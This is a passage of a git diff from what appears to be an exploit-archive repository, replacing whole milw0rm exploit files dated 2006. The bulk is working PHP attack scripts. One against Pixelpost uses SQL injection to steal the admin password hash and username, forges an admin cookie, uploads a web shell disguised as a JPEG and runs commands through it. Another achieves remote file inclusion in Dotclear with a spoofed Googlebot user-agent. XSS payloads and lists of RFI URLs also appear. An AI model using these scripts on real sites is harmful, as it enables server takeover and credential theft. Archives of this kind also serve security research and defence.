-else {die ("Exploit failed...magic_quotes_gpc on here or code patched");}
-
-$sql="')/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
-$sql=urlencode($sql);
-$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("alt=\"",$html);
-$temp2=explode("\"",$temp[1]);
-$admin=trim($temp2[0]);
-echo "  \"   username          -> ".$admin."\r\n";
-}
-
-$cookie="pp_user=".$admin."; pp_password=".sha1($hash.$your_ip).";";
-$packet="GET ".$p."admin/index.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("Set-Cookie: ",$html);
-$cookie="";
-for ($i=1; $i<=count($temp); $i++)
-{
-$temp2=explode(" ",$temp[$i]);
-$cookie.=" ".$temp2[0];
-}
-echo "admin cookie            ->".$cookie."\r\n";
-
-$shell=
-'';
-srand(make_seed());
-$anumber = rand(1,99999);
-$my_file="suntzu".$anumber.".php";
-$data='
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="headline"
-
-Under Costruction... - Admin.
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="category[]"
-
-1
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="body"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="autodate"
-
-3
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="post_year"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="post_month"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="post_day"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="post_hour"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="post_minute"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="userfile"; filename="'.$my_file.'"
-Content-Type: image/jpeg
-
-'.$shell.'
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="submit"
-
-Upload
------------------------------7d6318101b00a2--
-';
-
-$packet="POST ".$p."admin/index.php?x=save HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6318101b00a2\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-
-$packet="GET ".$p."index.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("img src=\"",$html);
-$temp2=explode(" ",$temp[1]);
-for ($i=1; $i<=count($temp); $i++)
-{
-$temp2=explode("\"",$temp[$i]);
-if (eregi($my_file,$temp2[0]))
- {
-  $my_path=$temp2[0];
-  echo "shell -> ".$my_path."\r\n";
-  break;
- }
-}
-
-$packet="GET ".$p.$my_path." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (strstr($html,"*deli*"))
-{
- $temp=explode("*deli*",$html);
- die("Exploit succeeded...\r\n".$temp[1]);
-}
-else
-{
- echo "Failed to launch commands...";
-}
-?>
-
-# milw0rm.com [2006-06-03]
+#!/usr/bin/php -q -d short_open_tag=on
+alert(document.cookie)
+   http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_exif2=
+   http://[target]/[path]/admin/view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_path=
+
+   iv) another xss, without to be logged in:
+   http://[target]/[path]/admin/index.php?loginmessage=">
+
+   									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+
+}
+
+function is_hash($hash)
+{
+ if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
+ else {return false;}
+}
+
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$your_ip=$argv[3];
+$cmd="";$port=80;$proxy="";$table_prefix="pixelpost_";
+
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P") and ($temp<>"-T"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+if ($temp=="-T")
+{
+  $table_prefix=str_replace("-T","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else
+{
+$p='http://'.$host.':'.$port.$path;
+$temp=explode(":",$proxy);
+$your_ip=$temp[0];
+}
+
+echo "Trying sql injection in 'category' argument...\r\n";
+$sql="'/**/UNION SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
+$sql=urlencode($sql);
+$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("alt=\"",$html);
+$temp2=explode("\"",$temp[1]);
+$hash=trim($temp2[0]);
+if (is_hash($hash)){
+echo "admin md5 password hash -> ".$hash."\r\n";
+$sql="'/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
+$sql=urlencode($sql);
+$packet="GET ".$p."?x=browse&category=".$sql." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("alt=\"",$html);
+$temp2=explode("\"",$temp[1]);
+$admin=trim($temp2[0]);
+echo "  \"   username          -> ".$admin."\r\n";
+}
+else { echo "Trying with 'archivedate' argument...\r\n";
+$sql="')/**/UNION SELECT/**/'1','2',password,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
+$sql=urlencode($sql);
+$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("alt=\"",$html);
+$temp2=explode("\"",$temp[1]);
+$hash=trim($temp2[0]);
+if (is_hash($hash)){
+         echo "admin md5 password hash -> ".$hash."\r\n";
+         }
+else {die ("Exploit failed...magic_quotes_gpc on here or code patched");}
+
+$sql="')/**/UNION/**/SELECT/**/'1','2',admin,'4','5'/**/FROM/**/".$table_prefix."config/**/WHERE/**/id=1/*";
+$sql=urlencode($sql);
+$packet="GET ".$p."?x=browse&archivedate=".$sql." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("alt=\"",$html);
+$temp2=explode("\"",$temp[1]);
+$admin=trim($temp2[0]);
+echo "  \"   username          -> ".$admin."\r\n";
+}
+
+$cookie="pp_user=".$admin."; pp_password=".sha1($hash.$your_ip).";";
+$packet="GET ".$p."admin/index.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$cookie="";
+for ($i=1; $i<=count($temp); $i++)
+{
+$temp2=explode(" ",$temp[$i]);
+$cookie.=" ".$temp2[0];
+}
+echo "admin cookie            ->".$cookie."\r\n";
+
+$shell=
+'';
+srand(make_seed());
+$anumber = rand(1,99999);
+$my_file="suntzu".$anumber.".php";
+$data='
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="headline"
+
+Under Costruction... - Admin.
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="category[]"
+
+1
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="body"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="autodate"
+
+3
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="post_year"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="post_month"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="post_day"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="post_hour"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="post_minute"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="userfile"; filename="'.$my_file.'"
+Content-Type: image/jpeg
+
+'.$shell.'
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="submit"
+
+Upload
+-----------------------------7d6318101b00a2--
+';
+
+$packet="POST ".$p."admin/index.php?x=save HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6318101b00a2\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+
+$packet="GET ".$p."index.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("img src=\"",$html);
+$temp2=explode(" ",$temp[1]);
+for ($i=1; $i<=count($temp); $i++)
+{
+$temp2=explode("\"",$temp[$i]);
+if (eregi($my_file,$temp2[0]))
+ {
+  $my_path=$temp2[0];
+  echo "shell -> ".$my_path."\r\n";
+  break;
+ }
+}
+
+$packet="GET ".$p.$my_path." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (strstr($html,"*deli*"))
+{
+ $temp=explode("*deli*",$html);
+ die("Exploit succeeded...\r\n".$temp[1]);
+}
+else
+{
+ echo "Failed to launch commands...";
+}
+?>
+
+# milw0rm.com [2006-06-03]
diff --git a/platforms/php/webapps/1869.php b/platforms/php/webapps/1869.php
index 5115d4be8..206f198a2 100755
--- a/platforms/php/webapps/1869.php
+++ b/platforms/php/webapps/1869.php
@@ -1,189 +1,189 @@
-#!/usr/bin/php -q -d short_open_tag=on
-\r\n";
-die;
-}
-/*
-  software site: http://www.dotclear.net/
-
-  vulnerable code in layout/prepend.php near lines 78-104:
-
-...
-# Variable de conf
-$theme_path = $blog_dc_path.'/themes/';
-$theme_uri = dc_app_url.'/themes/';
-$img_path = dc_img_url;
-
-# Définition du thème et de la langue
-$__theme = dc_theme;
-$__lang = dc_default_lang;
-
-# Ajout des functions.php des plugins
-$objPlugins = new plugins(dirname(__FILE__).'/../'.DC_ECRIRE.'/tools/');
-foreach ($objPlugins->getFunctions() as $pfunc) {
-	require_once $pfunc;
-}
-
-# Définition du template
-if (!is_dir($theme_path.$__theme)) {
-	header('Content-type: text/plain');
-	echo 'Le thème '.$__theme.' n\'existe pas';
-	exit;
-}
-
-if (file_exists($theme_path.$__theme.'/template.php')) {
-	$dc_template_file = $theme_path.$__theme.'/template.php';
-} else {
-	$dc_template_file = $theme_path.'default/template.php';
-}
-echo $dc_template_file;
-# Prepend du template s'il existe
-if (file_exists(dirname($dc_template_file).'/prepend.php')) {
-	require dirname($dc_template_file).'/prepend.php';
-}
-...
-
-
-$blog_dc_path var is not sanitized before to be used to include files,
-on PHP5, because is_dir() and file_exists() funcs support ftp wrappers,
-you can include an arbitrary prepend.php file in a themes/default/ folder
-from a remote resource, poc:
-
-http://[target]/[path_to_dotclear]/layout/prepend.php?blog_dc_path=ftp://username:password@somesite.com&cmd=ls%20-la
-
-									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$loc=$argv[3];
-$cmd="";$port=80;$proxy="";
-
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$loc=urlencode($loc);
-$cmd=urlencode($cmd);
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$packet="GET ".$path."layout/prepend.php HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Cookie: blog_dc_path=".$loc."; cmd=".$cmd.";\r\n"; //through cookies, log this
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (strstr($html,"*deli*"))
-{echo "exploit succeeded...\r\n";
- $temp=explode("*deli*",$html);
- die($temp[1]);
-}
-else
-{echo "exploit failed...\r\n";
- //debug
- echo $html;
-}
-?>
-
-# milw0rm.com [2006-06-03]
+#!/usr/bin/php -q -d short_open_tag=on
+\r\n";
+die;
+}
+/*
+  software site: http://www.dotclear.net/
+
+  vulnerable code in layout/prepend.php near lines 78-104:
+
+...
+# Variable de conf
+$theme_path = $blog_dc_path.'/themes/';
+$theme_uri = dc_app_url.'/themes/';
+$img_path = dc_img_url;
+
+# Définition du thème et de la langue
+$__theme = dc_theme;
+$__lang = dc_default_lang;
+
+# Ajout des functions.php des plugins
+$objPlugins = new plugins(dirname(__FILE__).'/../'.DC_ECRIRE.'/tools/');
+foreach ($objPlugins->getFunctions() as $pfunc) {
+	require_once $pfunc;
+}
+
+# Définition du template
+if (!is_dir($theme_path.$__theme)) {
+	header('Content-type: text/plain');
+	echo 'Le thème '.$__theme.' n\'existe pas';
+	exit;
+}
+
+if (file_exists($theme_path.$__theme.'/template.php')) {
+	$dc_template_file = $theme_path.$__theme.'/template.php';
+} else {
+	$dc_template_file = $theme_path.'default/template.php';
+}
+echo $dc_template_file;
+# Prepend du template s'il existe
+if (file_exists(dirname($dc_template_file).'/prepend.php')) {
+	require dirname($dc_template_file).'/prepend.php';
+}
+...
+
+
+$blog_dc_path var is not sanitized before to be used to include files,
+on PHP5, because is_dir() and file_exists() funcs support ftp wrappers,
+you can include an arbitrary prepend.php file in a themes/default/ folder
+from a remote resource, poc:
+
+http://[target]/[path_to_dotclear]/layout/prepend.php?blog_dc_path=ftp://username:password@somesite.com&cmd=ls%20-la
+
+									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$loc=$argv[3];
+$cmd="";$port=80;$proxy="";
+
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$loc=urlencode($loc);
+$cmd=urlencode($cmd);
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$packet="GET ".$path."layout/prepend.php HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Cookie: blog_dc_path=".$loc."; cmd=".$cmd.";\r\n"; //through cookies, log this
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (strstr($html,"*deli*"))
+{echo "exploit succeeded...\r\n";
+ $temp=explode("*deli*",$html);
+ die($temp[1]);
+}
+else
+{echo "exploit failed...\r\n";
+ //debug
+ echo $html;
+}
+?>
+
+# milw0rm.com [2006-06-03]
diff --git a/platforms/php/webapps/1870.txt b/platforms/php/webapps/1870.txt
index ad7189eaa..06574cfca 100755
--- a/platforms/php/webapps/1870.txt
+++ b/platforms/php/webapps/1870.txt
@@ -1,39 +1,39 @@
-$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
-$$
-$$  BlueShoes Framework 4.6 <= Remote File Include Vulnerability
-$$  Script site: http://www.blueshoes.org/
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-$$
-$$              Find by: Kacper (a.k.a Rahim)
-$$
-$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-$$
-$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
-$$           Adam, DeathSpeed, Drzewko, pepi
-$$
-$$  Specjal greetz: DragonHeart ;-)
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-
-Expl:
-
-http://www.site.com/[BlueShoes_path]/applications/faq/Bs_Faq.class.php?APP[path][applications]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/filebrowser/fileBrowserInner.php?APP[path][core]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/filemanager/file.php?APP[path][core]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/filemanager/viewer.php?APP[path][core]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/imagearchive/Bs_ImageArchive.class.php?APP[path][core]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]
-
-http://www.site.com/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]
-
-#Pozdro dla wszystkich ;-)
-
-# milw0rm.com [2006-06-03]
+$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
+$$
+$$  BlueShoes Framework 4.6 <= Remote File Include Vulnerability
+$$  Script site: http://www.blueshoes.org/
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+$$
+$$              Find by: Kacper (a.k.a Rahim)
+$$
+$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+$$
+$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
+$$           Adam, DeathSpeed, Drzewko, pepi
+$$
+$$  Specjal greetz: DragonHeart ;-)
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+
+Expl:
+
+http://www.site.com/[BlueShoes_path]/applications/faq/Bs_Faq.class.php?APP[path][applications]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/filebrowser/fileBrowserInner.php?APP[path][core]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/filemanager/file.php?APP[path][core]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/filemanager/viewer.php?APP[path][core]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/imagearchive/Bs_ImageArchive.class.php?APP[path][core]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]
+
+http://www.site.com/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]
+
+#Pozdro dla wszystkich ;-)
+
+# milw0rm.com [2006-06-03]
diff --git a/platforms/php/webapps/1871.txt b/platforms/php/webapps/1871.txt
index 221bff77f..4f980c7f3 100755
--- a/platforms/php/webapps/1871.txt
+++ b/platforms/php/webapps/1871.txt
@@ -1,46 +1,46 @@
-$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
-$$
-$$  Webspotblogging 3.0.1 (path) <= Remote File Include Vulnerability
-$$  Script site: http://blogging.webspot.co.uk/
-$$  dork: Powered by WebspotBlogging
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-$$
-$$              Find by: Kacper (a.k.a Rahim)
-$$
-$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-$$
-$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
-$$           Adam, DeathSpeed, Drzewko, pepi
-$$
-$$  Specjal greetz: DragonHeart ;-)
-$$
-$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-/*
-inc/logincheck.inc.php:
-[code]
-....
-include($path."inc/footer.inc.php");
-exit();
- }
-....
-[/code]
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- And more verbs in
- inc/adminheader.inc.php
- inc/global.php
- inc/mainheader.inc.php
-*/
-
-Expl:
-
-http://www.site.com/[Webspotblogging_path]/inc/logincheck.inc.php?path=[evil_scripts]
-http://www.site.com/[Webspotblogging_path]/inc/adminheader.inc.php?path=[evil_scripts]
-http://www.site.com/[Webspotblogging_path]/inc/global.php?path=[evil_scripts]
-http://www.site.com/[Webspotblogging_path]/inc/mainheader.inc.php?path=[evil_scripts]
-
-#Pozdro dla wszystkich ;-)
-
-# milw0rm.com [2006-06-03]
+$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
+$$
+$$  Webspotblogging 3.0.1 (path) <= Remote File Include Vulnerability
+$$  Script site: http://blogging.webspot.co.uk/
+$$  dork: Powered by WebspotBlogging
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+$$
+$$              Find by: Kacper (a.k.a Rahim)
+$$
+$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+$$
+$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
+$$           Adam, DeathSpeed, Drzewko, pepi
+$$
+$$  Specjal greetz: DragonHeart ;-)
+$$
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+/*
+inc/logincheck.inc.php:
+[code]
+....
+include($path."inc/footer.inc.php");
+exit();
+ }
+....
+[/code]
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ And more verbs in
+ inc/adminheader.inc.php
+ inc/global.php
+ inc/mainheader.inc.php
+*/
+
+Expl:
+
+http://www.site.com/[Webspotblogging_path]/inc/logincheck.inc.php?path=[evil_scripts]
+http://www.site.com/[Webspotblogging_path]/inc/adminheader.inc.php?path=[evil_scripts]
+http://www.site.com/[Webspotblogging_path]/inc/global.php?path=[evil_scripts]
+http://www.site.com/[Webspotblogging_path]/inc/mainheader.inc.php?path=[evil_scripts]
+
+#Pozdro dla wszystkich ;-)
+
+# milw0rm.com [2006-06-03]
diff --git a/platforms/php/webapps/1874.php b/platforms/php/webapps/1874.php
index 65c233516..81a4b125f 100755
--- a/platforms/php/webapps/1874.php
+++ b/platforms/php/webapps/1874.php
@@ -1,146 +1,146 @@
-#!/usr/bin/php -q -d short_open_tag=on
- 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
